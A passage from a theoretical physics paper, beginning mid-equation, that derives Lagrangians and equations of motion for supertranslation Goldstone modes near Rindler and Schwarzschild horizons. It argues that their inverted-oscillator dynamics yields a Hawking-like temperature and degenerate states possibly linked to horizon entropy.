\delta \alpha (-\infty,x^A) = \lim_{v\rightarrow-\infty} \Big(\alpha \partial_{v} F + \partial^2_v F\Big) =0, \label{boundary}
\end{equation}
where horizon is located at $v\rightarrow -\infty$.
One of the obvious choices to satisfy the above condition is to set the total variation $\delta \alpha$ to be zero everywhere \cite{Donnay:2016ejv}. This naturally set the boundary condition at the horizon and furthermore makes the field $F$ non-dynamical. Therefore, we believe this restrictive condition does not capture the full potential of the Goldstone modes. Our goal of this paper is to go beyond and understand the dynamics of this Goldstone modes, which could be the potential candidate for the underlying degrees of freedom of the black hole. Therefore,
we first construct an appropriate Lagrangian of this mode and finally at the solution level we set the boundary condition such that Eq. (\ref{boundary}) is automatically satisfied at the horizon. Important to note that if one allows the fluctuation of $\alpha$ even at the boundary, one needs to take care of the appropriate boundary terms (e.g. see \cite{Bunster:2014mua}\cite{Perez:2016vqo}), which will be discussed in a separate paper
\subsection{Dynamical equation for $F$}
As we have already pointed out, in order to study the dynamics for $F$ we propose the Lagrangian $\mathcal{L}_{F}$ associated with the newly perturbed metric (\ref{rindler}) near the $r=0$ surface:
\begin{eqnarray}
\mathcal{L}_{F} = \sqrt{-g'} R' \label{L}~.
\end{eqnarray}
Here $R'$ is the Ricci scalar calculated for the newly constructed metric $g'_{ab}$ (\ref{rindler}) and $g'$ is the corresponding determinant. To study the dynamics of the Goldstone mode associated with the horizon symmetry, first we will compute the above Lagrangian eq. (\ref{L}) at arbitrary $r$ value in the bulk spacetime and then we take the limit $r\rightarrow 0$. This procedure is similar to the stretched horizon approached in black hole thermodynamics (for example see the discussion in section $4$ of \cite{Carlip:1999cy}). In this approach, if we are interested to find any quantity on a particular surface (say $r=0$), one usually first calculate the same just away from this surface (say $r=\epsilon$, with $\epsilon$ is very small). After that the obtained value is derived by taking the limit $\epsilon\rightarrow 0$.
Now we are in a position to expand our Lagrangian (\ref{L}) in terms of the transformed metric (\ref{rindler}). If the background metric components are $g_{ab}=g_{ab}^{(0)}+h_{ab}$, with $h_{ab}$ as a small fluctuation, in general the Taylor series expansion of the Lagrangian around background metric $g_{ab}=g_{ab}^{(0)}$ can be written as
\begin{equation}
\mathcal{L_{F}} = \mathcal{L_{F}}(g_{ab}^{(0)}) + h_{ab}\Big(\frac{\delta\mathcal{L_{F}}}{\delta g_{ab}}\Big)^{(0)} + h_{ab}h_{cd}\Big(\frac{\delta^2\mathcal{L_{F}}}{\delta g_{ab} \delta g_{cd}}\Big)^{(0)}+\dots
\label{BRM4}
\end{equation}
The first term of the above equation obviously does not contribute to the dynamics. Given the background metric to be a solution of equation of motion, the second term vanishes as it is essentially proportional to the Einstein's equation of motion. Third term introduces the quadratic form for the Goldstone field $F$. For our purpose of the present paper, we will restrict only to Lagrangian for the Goldstone mode which is at the quadratic order. All the higher order in $F$-terms we left for our future discussions.
The final form of the Lagrangian (\ref{L}) after taking the near Horizon limit comes out as:
\begin{eqnarray}
{\mathcal{L}_{F}} &=& \lim_{r \to 0} \Big(\sqrt{-g'} R'\Big)
\nonumber\\
&=& \Big[-6 \alpha^2 \partial_y F \partial_y F -6 \alpha^2 \partial_z F \partial_z F
+4 \alpha \partial_v F \partial^2_y F \nonumber\\ & -& 12 \alpha \partial_z F \partial_v \partial_z F - 6(\partial_v \partial_z F)^2 - 12 \alpha \partial_y F \partial_v \partial_y F \nonumber\\ &-& 6(\partial_v \partial_y F)^2 + 4 \partial^2_y F \partial^2_v F + 4 \partial^2_z F (\alpha \partial_v F + \partial^2_v F) \Big]~.\nonumber\\
\label{RL}
\end{eqnarray}
Since ${\mathcal{L}_{F}}$ is calculated on a $r=$ constant surface, the action can be defined as the integration of the above Lagrangian on $v,y$ and $z$. Th induced horizon geometry has flat spacial section, we, therefore, consider the following generic form of $F$:
\begin{eqnarray}
F_{mn} = f_{mn}(v) \frac{1}{\alpha} \exp\Big[i (my+nz)\Big]~.
\label{F}
\end{eqnarray}
Hence the general solution for Goldstone mode would be,
\begin{eqnarray}
F(v,y,z) = \sum_{m,n} C_{mn} F_{mn}~.
\end{eqnarray}
Here we need to find the form of $f_{mn}(v)$ from the solution of the equation of motion obtained from (\ref{RL}). It is quite obvious that substitution of the above ansatz and then integrating over transverse coordinates one can get an one dimensional action which determine the evaluation of $f_{mn}(v)$ with respect to $v$. Since the total derivative terms in action keep the dynamics unchanged, it may be verified that under the integration of transverse coordinates third, fourth, sixth and ninth terms are total derivative terms with respect to $v$. So, those terms can be neglected.
Ignoring total derivative terms the final form of the Lagrangian (\ref{RL}) is given as;
\begin{eqnarray}
{\mathcal{L}_{F}} &=& \Big[-6 \alpha^2 \partial_y F \partial_y F -6 \alpha^2 \partial_z F \partial_z F- 6(\partial_v \partial_y F)^2 \nonumber\\ &-& 6(\partial_v \partial_z F)^2+ 4 \partial^2_y F \partial^2_v F + 4 \partial^2_z F \partial^2_v F \Big]~. \label{Lfi}
\end{eqnarray}
Before proceeding further, here we want to mention an important point of our proposed form of the Goldstone boson Lagrangian. Since the modified metric (\ref{rindler}) has been constructed by taking into account a particular type of diffeomorphism, one always concludes that the Lagrangian must be invariant upto a total derivative. Contribution of the total derivative term vanishes over the closed boundaries which encloses the bulk of the manifold. For instance, in the case of $\sqrt{-g}R$, the variation of it under diffeomorphism $x^a\rightarrow x^a+\xi^a$ leads to $\sqrt{-g}\nabla_a(R\xi^a)=\partial_a(\sqrt{-g}R\xi^a)$, which is a total derivative term.
In this analysis we are interested to build a theory on the horizon (i.e. $r=0$) and horizon is a part of the closed boundary of the bulk manifold. Therefore it is expected that the total derivative term will give non-vanishing contribution on a part of the closed surfaces such as horizon. In the case of $\sqrt{-g}R$, the
boundary term on $r=$ constant surface in the variation of action is given by $\int d^3x\hat{n}_a\xi^a \sqrt{-g}R$, where $\hat{n}_a$ is the normal to the surface with components $(0,1,0,0)$. Therefore, on this surface our proposal for the Lagrangian density (loosely call it as Lagrangian) is $\sqrt{-g}R$. This is precisely considered here. The Lagrangian (\ref{RL}) is not the one which is defined for the whole
spacetime, rather it is calculated on the $r=$ constant surface, and hence coming out to be non-trivial. In this sense our proposed
Lagrangian does not carry any ambiguity and correctly describe the dynamics of the Goldstone mode $F$ associated with the super-transnational symmetry near the horizon.
Next we concentrate on Gibbons-Hawking-York (GHY) boundary term
\begin{equation}
\mathcal{S}_2 =- \frac{1}{8\pi G}\int d^3x \sqrt{h}K~,
\label{GHY}
\end{equation}
which is usually added to the action in order to define a proper variation of the action. The trace of the extrinsic curvature of the boundary surface ($r\rightarrow 0$) is given by $K = -\nabla_a N^a$, where $N^a$ is considered as the unit normal to the $r=constant$ hyper-surface. For metric (\ref{rindler}), its lower component is given by $ N_a =(0, 1/\sqrt{2r(\alpha +\alpha \partial_v F +\partial^2_{v} F)},0,0) $. Therefore in the near horizon limit ($r \rightarrow 0$), one gets the following form of the action coming from the GHY term:
\begin{eqnarray}
&&\mathcal{S}_2= -\frac{1}{8 \pi G}\int d^3 x\Big[\alpha +\Big(\alpha \partial_v F + \frac{1}{2}\partial^2_v F + \frac{1}{2 \alpha} \partial^3_v F\Big)
\nonumber\\
&&+ \frac{1}{2 \alpha
^2}\Big(\alpha^2 \partial_v F \partial^2_v F + \alpha (\partial^2_v F)^2 + \alpha \partial_v F \partial^3_v F
\nonumber
\\
&&+ \partial^2_v F \partial^3_v F \Big)\Big]~.
\label{Kac}
\end{eqnarray}
However, we observed that this terms does not contribute to our required equation of motion.
In fact, the above boundary term in the action is turned out to be related to the horizon entropy which is discussed in appendix (\ref{App2}).
Note that the aforesaid Lagrangian (\ref{RL}) contains higher derivative terms of $F$. Therefore, the theory of Goldstone boson modes emerging on the boundary of a gravitational theory turns out to be higher derivative in nature. However, if we want to trace back the origin of this higher derivative action, it is from the diffeomorphically transformed metric components which already contains the derivative term. However, we will see those higher derivative terms will be crucial for our subsequent discussions on the horizon properties. This connection could be an interesting topic to investigate further. However, one of the important point here is that at the background label system is not Lorentz invariant. The generalized Euler-Lagrangian equation, defined for higher derivative theory, is:
\begin{eqnarray}
\frac{\partial L}{\partial F} - \partial_{\mu}(\frac{\partial L}{\partial (\partial_{\mu} F)}) + \partial_{\mu} \partial_{\nu} (\frac{\partial L}{\partial (\partial_{\mu} \partial_{\nu} F)}) =0 .\label{GenEH}
\end{eqnarray}
With this the equation of motion is found to be
\begin{eqnarray}
3 \alpha^2 \partial^2_y F +3 \alpha^2 \partial^2_z F -4 \partial^2_y \partial^2_v F -4 \partial^2_z \partial^2_v F =0~.
\label{BRM5}
\end{eqnarray}
Important to note again, the contribution on the equation of motion comes only from from (\ref{Lfi}). GHY (\ref{Kac}) term does not contribute.
Substitution of (\ref{F}) in (\ref{BRM5}) yields
\begin{eqnarray} \label{modeeq1}
(m^2 +n^2) [\partial^2_{v}f_{mn}(v) -\frac{3 \alpha^2}{4} f_{mn}(v)]= 0~.
\end{eqnarray}
Important point to note that every individual mode ($m,n$), will follow the same equation of motion of a simple oscillator in an inverted harmonic potential. The solution will be,
\begin{eqnarray}
f_{mn}(v) && = A \exp\Big[(\sqrt{3/4}) \alpha v\Big] + B \exp\Big[-(\sqrt{3/4}) \alpha v \Big] \nonumber\\ &+ & f_1 (y,z) \delta_{m,0} \delta_{n,0}\label{Gsol}~,
\end{eqnarray}
for all $m,n$.
In the above, $A$ and $B$ are arbitrary constants to be determined. So far we talked about the classical dynamics of the Goldstone mode. It is apparent that the system is unstable because of the inverted harmonic potential at least at the tree level Lagrangian.This is also apparent from the solution (\ref{Gsol}). As we are interested to the near horizon region where $v\rightarrow -\infty$, the above solution grows rapidly and makes the mode unstable. Therefore, the appropriate boundary condition one can set is $B=0$, leading to
\begin{eqnarray}
F_{mn} (v,y,z) &&= [A \exp[(\sqrt{3}/2) \alpha v] \nonumber\\ &+& f_1 (y,z) \delta_{m,0} \delta_{n,0} ] \ \frac{1}{\alpha }\exp [i (my+nz)]~.\nonumber\\ \label{gsol2}
\end{eqnarray}
Interesting this is precisely the boundary condition which satisfies the condition of vanishing fluctuation of surface gravity $\delta \alpha=0$ at the horizon defined by the Eq. (\ref{boundary}).
We already know that the horizon is a special place in the entire spacetime region, as any two hypothetical observers spatially separated by the horizon can never communicated to each other. Therefore, it would have been unusual, had there been just simple stable free field like Lagrangian for the Goldstone modes. The connection between these special nature of the horizon and emergence of instability is the subject of study for a long time. Our goal of this paper would be to shed some light on this issue. {\em Does the emergence of the inverted harmonic potential has anything to do with the thermal nature of the black hole horizon?} Of course in order to understand this, we need to go to beyond the classical regime. In the next section we will try to make this connection considering a recent proposal \cite{Morita:2018sen}\cite{Morita:2019bfr}.
\subsection{Thermal behaviour of the field solution} \label{thermal}
In this section we consider the quantum mechanical treatment of the Goldstone boson mode discussed so far.
It has recently been conjectured that Lyapunov exponent $\lambda$ of a thermal quantum system, in presence of quantum chaos, is bounded by the temperature $T$ of the system as $\lambda \leq 2\pi T/\hbar$ \cite{Maldacena:2015waa}. Based on this result further conjecture has been made in the reference \cite{Morita:2019bfr}\cite{Kurchan:2016nju} which says that a chaotic system with a definite Lyapunov exponent could be fundamentally thermal by reversing the above inequality. To justify the argument, one of the interesting example the author has studied is the semi-classical dynamics of a particle in an inverted harmonic potential{\footnote{The choice of the inverted harmonic oscillator stems from the fact that the particle motion is unstable under this potential and hence, at the classical level, any small perturbation can lead induction of chaos in the motion (for example, see \cite{Bombelli:1991eg}).}}, and showed that the quantum correction induces an energy emission by the particle under study obeying thermal probability distribution.
Therefore, the connection between the semi-classical chaotic system and the thermal nature is emerged.
Interestingly, for our present system, each individual Goldstone boson mode behaves like an inverted harmonic oscillator. Hence, the aforesaid connection between the thermal emission and the semi-classical chaotic dynamics could be a potential reason for the thermal nature of the black hole horizon. Even more interestingly, every individual Goldstone boson mode parametrized by $(m,n)$ see the same inverted potential, which may also indicate the universality of the thermal nature of the horizon.
{\em Our present claim is ambitious and exciting which needs detailed future exploration}.
Before we resort to our discussion of thermal nature of the black hole, let us briefly describe the connection between the thermality and the inverted harmonic oscillator, following from the reference \cite{Morita:2018sen}\cite{Morita:2019bfr}.
These are connected with the finite quantum mechanical transition probability through a potential barrier. The equation of motion of the particle moving in a harmonic potential is given by,
\begin{eqnarray}
\mu \ddot{x} -\omega x =0 \label{1dParticle}
\end{eqnarray}
Here potential $V= -\frac{\omega x^2}{2}$, and $\mu$ is the mass of the particle. Important case would be, if one considers the energy of the particle $E < 0$,
for which the potential energy of the particle is greater than its kinetic energy. With this energy if the particle travels toward the potential from the left ($x<0$), classically it cannot pass through the potential towards right $(x >0$). However, quantum mechanically the particle will have finite tunneling probability to go across the potential barrier. Therefore, the particle will have finite probability of transmission through the barrier even for $E<0$. In the similar manner for $E>0$, the particle will have finite quantum mechanical probability of reflection off the barrier, which otherwise was not possible classically.
Therefore, to describe the above quantum mechanical phenomena the appropriate Hamiltonian for the wave function $\Phi(x)$ associated with the particle is expressed as
\begin{eqnarray}
H = -\frac{{\hbar}^2}{2}\frac{d^2}{d x^2} - \frac{{\omega} x^2}{2}
\end{eqnarray}
with the Schr\"{o}dinger equation,
\begin{eqnarray}
-\frac{{\hbar}^2}{2}\frac{d^2 \Phi}{d x^2} - \frac{{\omega} x^2}{2} \Phi =E \Phi~.
\end{eqnarray}
$E$ is the energy of the paticle. The well known expression for the probability of transmission($P_T$) and the reflection ($P_R$) using WKB approximation (detail in \cite{Barton:1984ey}) are given as,
\begin{eqnarray}
P_{T/R} = \frac{1}{e^{\frac{2 \pi}{\hbar} \sqrt{\frac{\mu}{ \omega}} |E|} +1} = \frac{1}{ e^{\beta |E|} +1}~.
\label{trans}
\end{eqnarray}
An interesting interpretation of this expression is that for large absolute value of the energy $E$, probability amplitude from classical path to quantum transmission or reflection will be $\exp[-\beta |E|]$.
Therefore, the quantum harmonic oscillator system can be mapped to a
two level system with temperature $T$, whose ground state is represented as the classical trajectories and excited state is quantum one. And the temperature of the system can be easily identified as
\begin{eqnarray}
T = \frac{\hbar}{2 \pi} \sqrt{\frac{\omega}{\mu}} ~.
\label{R2}
\end{eqnarray}
For further detail of this interesting interpretation the reader can look into the reference \cite{Morita:2018sen} \cite{Morita:2019bfr}). In this context it is worth to mention that recently one of the authors of this paper also showed by an independent and completely different way that the inverted harmonic oscillator gives rise to temperature at the quantum level \cite{Dalui:2019esx}.
In our present analysis we have obtained the dynamical equation of motion for individual mode as given in (\ref{modeeq1}). Comparing this with Eq. (\ref{1dParticle}) one can easily conclude that the dynamics of the mode along $v$ is governed by inverted harmonic oscillator potential. To clarify our analogy, each mode $f_{mn}(v)$ can be thought of as the position $x(t)$ of a particle of mass unity with $v$ playing the role of time coordinate as $t$. Therefore, we have following equivalence table:
\begin{eqnarray}
f_{mn} \equiv x; \,\,\,\,\ v \equiv t;
\end{eqnarray}
accompanied by the identifications
\begin{equation}
\mu \equiv 1;\,\,\,\,\
\omega \equiv \frac{3 \alpha^2}{4}~.
\end{equation}
Hence by the earlier argument, we can conclude that each mode, at the quantum level, is thermal. The temperature is evaluated as (\ref{R2}) with the following substitutions: $\mu=1$ and $\omega=(3\alpha^2/4)$. Therefore in our case it is given by
\begin{eqnarray}
T = \frac{\hbar}{2 \pi} \frac{\sqrt{3}\alpha}{2} ~.
\end{eqnarray}
Even more interestingly what is emerged from our present calculation that all the modes with quantum number $(p,q)$ are degenerate with respect to $E$. {\em This observation seems to suggest that the horizon under study can carry entropy because of those degenerate quantum states}. However, in order to have finite entropy, we need to have an upper limit on the value of $(p,q)$, which must be proportional to the only scale available in the theory namely Planck scale.
Our naive analysis based on \cite{Morita:2018sen}, shows that semi-classical Goldstone boson dynamics can capture the well known thermal behaviour of the horizon. {\em Moreover, the temperature turned out to be proportional to the acceleration of the Rindler frame}. This is an important observation as we know that the Rindler horizon is thermal with respect to its own frame. In this case also the temperature is proportional to $\alpha$, known as {\it Unruh temperature} \cite{Unruh:1976db}.
However, the proportionality constant appeared to be different.
{\em Another important outcome of our analysis is the emergence of infinite number of degenerate states which can be associated with the entropy on this horizon}. We will take up this issue in our future publication. The microscopic origin of the horizon thermodynamics is a subject of intensive research for a long time. Our present analysis hints towards an important fact that the BMS like symmetry near the horizon could play important role in understanding the thermal nature and possible origin of the underlying microscopic states of a black hole. Motivated by our analysis, in the subsequent section we will discuss about the Schwarzschild black hole.
\section{Schwarzschild black hole}
So far we have discussed about the dynamics of Goldstone boson mode in Rindler background. To this end we perform similar analysis considering Schwarzschild black hole background.
The near horizon geometry of the Schwarzchild black is again Rindler, however, with two dimensional sphere at each point. Therefore, we expect similar behavior of the Goldstone mode for this case as well. As we go along we also notice the main differences with flat Rindler case.
The Schwarzschild metric in Eddington-Finkelstein coordinate ($v,r,\theta,\phi$) is expressed as,
\begin{equation}
ds^2 = -(1- 2M/r) dv^2 + 2 dv dr + r^2 \gamma_{AB} dx^A dx^B~.
\label{metric}
\end{equation}
The event horizon is located at $r=2 M$. $M$ is the mass of the black hole which characterizes the macroscopic state of the background spacetime. Asymptotic symmetry properties of the horizon can be extracted from similar fall off and gauge conditions for the metric components,
\begin{eqnarray}
\pounds_\zeta g_{rr}= 0, \ \ \ \pounds_\zeta g_{vr}=0, \ \ \ \pounds_\zeta g_{Ar}=0~;\label{con2}\\
\pounds_\zeta g_{vv} \approx \mathcal{O}(r); \ \ \ \pounds_\zeta g_{vA} \approx \mathcal{O}(r); \ \ \ \pounds_\zeta g_{AB} \approx \mathcal{O}(r)~.
\label{con3}
\end{eqnarray}
Here, $\pounds_\zeta$ corresponds to the Lie variation for the diffeomorphism $x^a\rightarrow x^a+\zeta^a$.
The primary motivation to consider the aforementioned conditions is essentially to preserve the form of the metric under the diffeomorphism. As has already been observed in our previous case, those differmorphsim in turn renormalizes the state of the black hole parameter such as mass $M$ of the Schwarzschild black hole. Similar to our previous analysis after solving the above gauge fixing conditions with the imposed fall-off conditions, the diffeomorphism vectors turned out to be,
\begin{eqnarray}
\zeta^a \partial_a= F(v,x^A) \partial_v -(r-2M) \partial_v F \partial_r \nonumber\\ + (1/r -1/2M) \gamma^{AB} \partial_{B} F \ \partial_A .
\end{eqnarray}
Again we have one unknown function $F$ which is identified as supertranslation generator. Under this transformation the background metric takes of following form \cite{Averin:2016ybl},
\begin{eqnarray}
g'_{ab} &=& \Big [g^{(0)}_{ab} + \pounds_\zeta g^0_{ab} \Big] dx^a dx^b\nonumber\\
&=& -(1- 2M/r) dv^2 + 2 dv dr + r^2 \gamma_{AB} dx^A dx^B \nonumber\\
&+& \Big[2M/r(1- 2M/r) \partial_v F - 2 (1- 2M/r)\partial_v F \nonumber\\&& -2 (r-2M) \partial^2_v F \Big] dv^2 + \Big[-(1-2M/r) \partial_{A} F \nonumber\\ &&-(r-2M) \partial_{A}\partial_v F + r^2 \partial_{A}\partial_v F (1/r - 1/2M) \Big] dv dx^A \nonumber\\ &+& \Big [-2 (2M-r)r \gamma_{AB} \partial_v F\nonumber\\ &-& (1/r -1/2M)(\partial_E F \gamma^{DE} \partial_D \gamma_{AB}\nonumber\\ &+& \gamma_{AD} \ \partial_B (\partial_E F \gamma^{DE})) \Big] dx^A dx^B~.
\label{SS}
\end{eqnarray}
As has already been discussed for the Rindler metric with flat spatial section, for the present case the modification $h_{ab}$ due to following super-translation,
\begin{equation}
v'= v + F~;~x'^A = x^A + (1/r -1/2M) \gamma^{AB} \partial_{B} F ,
\end{equation}
the macroscopic black hole state parameter $M$ renormalizes to,
\begin{equation}
\frac{1}{M} \rightarrow \frac{1}{M} +\frac{1}{M}\Big(\partial_{v} F + 4 M \partial^2_v F\Big) .
\end{equation}
Therefore, this change of macroscopic state by the symmetry transformation can similarly be understood as a breaking of the boundary super-translation symmetry with $F$ as the broken symmetry generator.
Following the same procedure as for the Rindler case, the Lagrangian $\mathcal{L}_{F}$ of the Goldstone mode on the horizon surface takes the following form,
\begin{eqnarray}
\mathcal{L_{F}}&=& \Big[ \frac{-3}{2 (2M)^2} \csc\theta \ \partial_{\phi} F \partial_{\phi} F - \frac{3}{2 (2M)^2} \sin\theta \ \partial_{\theta} F \partial_{\theta} F \nonumber\\ &+& 4 \sin\theta \ \partial_{v} F \partial_{v} F - \frac{3}{M} \csc\theta \ \partial_{\phi} F \partial_{v} \partial_{\phi} F \nonumber\\ &+& \frac{1}{M} \cos\theta \ \partial_{\theta} F \partial_{v} F -\frac{3}{M} \sin\theta \ \partial_{\theta} F \partial_{\theta} \partial_{v} F \nonumber\\ &+& 4 \cos\theta \ \partial_{\theta} F \partial^2_{v} F + \frac{1}{M} \csc \theta \ \partial^2_{\phi} F \partial_v F\nonumber\\ & +& 4 \csc\theta \ \partial^2_{\phi} F \partial^2_{v} F + \frac{1}{M} \sin\theta \ \partial^2_{\theta} F \partial_v F\nonumber\\ & +& 4 \sin\theta \ \partial^2_{\theta} F \partial^2_{v} F - 6 \csc\theta \ (\partial_v \partial_{\phi} F)^2 \nonumber\\ &-& 6 \sin\theta \ (\partial_v \partial_{\theta} F)^2 + 8 \sin\theta \ \partial_v F \partial^2_v F \Big]~.
\label{LagS}
\end{eqnarray}
\
Neglecting total derivative terms, we can write final Lagrangian as,
\begin{eqnarray}
\mathcal{L_{F}}&=& \Big[ \frac{-3}{2 (2M)^2} \csc\theta \ \partial_{\phi} F \partial_{\phi} F - \frac{3}{2 (2M)^2} \sin\theta \ \partial_{\theta} F \partial_{\theta} F \nonumber\\ &+& 4 \sin\theta \ \partial_{v} F \partial_{v} F + 4 \cos\theta \ \partial_{\theta} F \partial^2_{v} F \nonumber\\ &+& 4 \csc\theta \ \partial^2_{\phi} F \partial^2_{v} F + 4 \sin\theta \ \partial^2_{\theta} F \partial^2_{v} F\nonumber\\ &-& 6 \csc\theta \ (\partial_v \partial_{\phi} F)^2 - 6 \sin\theta \ (\partial_v \partial_{\theta} F)^2 \Big]~.\label{lags1}
\end{eqnarray}
Here the non-vanishing lower components of $N^a$ is given by
\begin{eqnarray}
N_r = \frac{1}{\sqrt{f(r)- (2M/r)f(r) \partial_v F +
2 f(r)\partial_v F +2rf(r) \partial^2_v F}}~,
\end{eqnarray}
where $f(r)=1-2M/r$.
Hence for GHY boundary term the action can be expressed as,
\begin{eqnarray}
\mathcal{S}_2 &=& - \frac{M}{8 \pi G}\int d^3 x \sin\theta \Big[1 + (\partial_v F + 2M \partial^2_v F)\nonumber\\ &+& (2M \partial_v F \partial^2_v F + 8 M^2 (\partial^2_v F)^2 + 8 M^2 \partial_v F \partial^3_v F\nonumber\\ &+& 32 M^3 \partial^2_v F \partial^3_v F) \Big ]~,
\label{K}
\end{eqnarray}
which is again does not contribute to the equation of motion as was the case for Rindler space.
The dynamics of the Goldstone mode will be governed by the action corresponding to $\mathcal{L_{F}}$, and the equation of motion is given by,
\begin{eqnarray}
&& -8 \sin\theta \partial^2_v F + \frac{3}{(2M)^2} \cos\theta \partial_{\theta} F + \frac{3}{(2M)^2} \sin\theta \partial^2_{\theta} F \nonumber\\ &+& \frac{3}{(2M)^2} \csc\theta \partial^2_{\phi} F -16 \sin\theta \partial^2_v \partial^2_{\theta} F-16 \cos\theta \partial^2_v \partial_{\theta} F\nonumber\\ &-& 16 \csc\theta \partial^2_v \partial^2_{\phi} F = 0~.
\label{eqn}
\end{eqnarray}
In this analysis full metric has been considered. Since we are interested in the near horizon symmetries, the near horizon metric could be enough to obtain the same result. For completeness, we explicitly demonstrated this in Appendix \ref{App1}.
Since the action has the rotational symmetry, we can take the following solution ansatz for Goldstone boson mode in terms of spherical harmonic,
\begin{equation}
F(v,\theta,\phi)=\frac{1}{k} \sum_{lm} {c_{lm}}f_{lm}(v) Y_{lm}(\theta,\phi)\label{F1},
\end{equation}
with $c_{lm}$ are constant coefficients and $f_{lm}$ are the time dependent mode function. This is consistent with the spherically symmetric Schwarzschild geometry. The factor ${1}/{k} = {4M}$ is introduced for dimensional reason.
Substituting the form of $F$ (\ref{F1}) in (\ref{eqn}) we get following equation of motion for $f_{lm}(v)$
\begin{eqnarray} \label{modeeq2}
&& [2l(l+1) -1] \partial^2_{v} f_{lm} - \frac{3}{32 M^2} l(l+1) f_{lm} = 0 .
\end{eqnarray}
Since the near horizon geometry of the Scwarzchild black hole is Rindler with sphere as spatial section, one notices some significant differences in the mode dynamics governed by eq. (\ref{modeeq2}) and that of the previous case in eq.(\ref{modeeq1}). Most importantly, for spatial spherical geometry the effective potential perceived by every individual mode parametrized by $(l,m)$ is no longer universal but dependent upon the angular momentum $l$. Before we discuss the implications of this dependence, let us take a look at the behaviour of individual modes.
\begin{itemize}
\item For $l=0$ mode, the equation reduces to,
\begin{equation}
\partial^2_{v} f_{00}(v) =0~.
\end{equation}
The solution of the above equation is $f_{00} = c_1(x^A) v + c_2(x^A)$. By choosing $c_1=0$, the final solution will be $f_{00}(v) = c_2(x^A)$.
\item For all remaining modes $l\geq 1$, we get the inverted harmonic oscillator potential similar to our previous case. One important difference is the angular momentum dependence of the inverted harmonic potential. Therefore, the universality of all the modes with respect to their time dynamics is lost as opposed to our previous study in Rindler metric with spatial section. However, it can be checked that numerically the inverted potential depends very weakly on the value of $l$, which we will discuss in terms of temperature in the next subsection. Nonetheless, the mode equation looks likes,
\begin{eqnarray}
\partial^2_{v} f_{lm} -k^2 \Omega^2 f_{lm}(v) = 0~,
\end{eqnarray}
where,
\begin{equation}
\Omega = \sqrt{\frac{3 l (l+1)}{ 2(2 l(l+1)-1)}}~.
\end{equation}
We get the inverted harmonic oscillator potential similar to our previous case.
\end{itemize}
The complete solution for all modes can therefore be,\\
\begin{itemize}
\item for $l=0$ ;
\begin{eqnarray}
F(x^A) = \sum_{lm} \frac{1}{k} c_2(x^A) Y_{lm}(x^A);
\end{eqnarray}
\item for $l \geq 1$,
\begin{eqnarray}
F(v,x^A) = \sum_{lm} \frac{A}{k} e^{ k v} Y_{lm}(x^A)~.
\label{solSR}
\end{eqnarray}
\end{itemize}
Hereafter we can proceed along the same line as discussed before. Important difference would be the state dependent inverted harmonic potential
\begin{equation}
V_{harmonic} = - \frac12 \Omega(l)^2 {k}^2 f_{lm}^2~.
\end{equation}
Therefore, strictly speaking for the present case degenerate states will be only for $m$ within $(-l,l)$. However, let us point out that if we consider numerical values into consideration, the value of $\Omega$ is confined within a very narrow region
\begin{equation}
\sqrt{\frac{3}{4}}\leq\Omega(l)\leq 1~.
\end{equation}
Hence, one can approximately consider all the quantum states of the Goldstone boson parametrized by $(l,m)$ with $l\geq1$, are quasi-degenerate.
Unlike the previous case for the Rindler spacetime with flat spatial section, the emission probability for the present case would be identified with Boltzmann distribution with temperature,
\begin{eqnarray}
T_l = \frac{\hbar}{8 \pi M} \Omega(l) ,
\end{eqnarray}
which will weakly depend upon the value of angular momentum quantum number $l$. Interestingly for $l=1$ mode the above expression came out exactly same as usual black hole temperature $T_{BH}$, given by the Hawking expression \cite{Hawking:1974rv}. However considering other modes we can define an average temperature
\begin{equation}
T_{avg} = \frac{\hbar}{8 \pi M} \left(\frac{\sum_l \Omega(l)}{\sum_l 1}\right) = \frac{\hbar }{8 \pi M} \left(\sqrt{\frac34}\right) = \frac{\sqrt{3}}{2} T_{BH}~,
\end{equation}
Here again we observed that the Goldstone modes are inherently thermal in nature. The obtained temperature is proportional to the Hawking expression for that of the Schwarzschild horizon.
From the analysis so far what we can infer is that since the origin of the Goldstone modes are associated with the breaking of symmetries of the horizon, those modes can be a potential candidate for the microscopic states of a black hole. Quantum mechanically all those states turned out to be thermal with a specific temperature. However, origin of different expressions for the temperature compared with that of the usual Hawking temperature needs to be explored in detail. Furthermore, nature of degeneracy of those Goldstone states appears to be dependent upon the spacetime background. Such as for Rindler spacetime with plane symmetric horizon, all the modes emerged as degenerate and, therefore, each mode fills the same temperature. On the other hand for Schwarzschild black hole this is not the case as the degeneracy of states has been lifted by the less symmetric spherical horizon. Nevertheless, we hope that this thermal nature of the Goldstone modes at the quantum level can be inferred for all types of horizon. We keep this for our future project.
\section{Summary and conclusions}
Microscopic origin of the thermodynamic nature of the black hole is one of fundamental questions in the theory of gravity. It is obvious that within the framework of Einsteinian gravity this question can not be answered. However, the recent understanding of infrared behavior of gravity opens up a new avenue towards understanding this question. In the gravitational theory, one of the interesting infrared properties is the emergence of infinite dimensional symmetry at null infinity which leads to soft graviton theorem. Over the years it has been observed that analogous symmetry exists near the null horizon which can play important role in explaining the microscopic origin of horizon thermodynamics. Here we particularly concentrated on the BMS-like symmetry in the near horizon region. Under the diffeomorphism symmetry, appropriate boundary conditions are imposed in such a way that the near horizon form of the metric remains unchanged. It is observed that in this process the macroscopic parameters, like mass (surface gravity), get modified. This change in macroscopic parameters is argued to be the phenomena of symmetry breaking on the horizon and corresponding parameter can be viewed as the Goldstone mode.
In the present paper our main effort was to explore the dynamics of these Goldstone modes. For the purpose of our present study, we consider two simple gravitational background. One is simple Rindler spacetime with flat Killing horizon and the other one is Schwarzschild black hole.
Our preliminary investigation at tree level reveals that the horizon is indeed a special place where the dynamics of the Goldstone mode in momentum space is governed by inverse harmonic potential. As mentioned earlier, in the framework of classical Einsteinian gravity it is difficult to understand this situation as those modes are simply unstable. Interestingly, at the quantum level this instability \cite{Morita:2019bfr} can have a nice interpretation in terms of inherent thermality in connection with its chaotic behaviour, which may provide us a first glimpse of microscopic view of the horizon thermodynamics. Interestingly, for both the gravitational backgrounds, as expected the temperature turned out to be proportional to the surface gravity which is similar to the expression (except a numerical factor) given by Unruh \cite{Unruh:1976db} and Hawking \cite{Hawking:1974rv}. This led us to think that these Goldstone modes might be candidates for the microscopic description of the horizon thermality.
Even more interestingly, we found out large number of degenerate states for Rindler and qusi-degenerate states for Schwarzschild black holes which may be responsible for the horizon entropy. We will take up these issues in more detail in future publication.
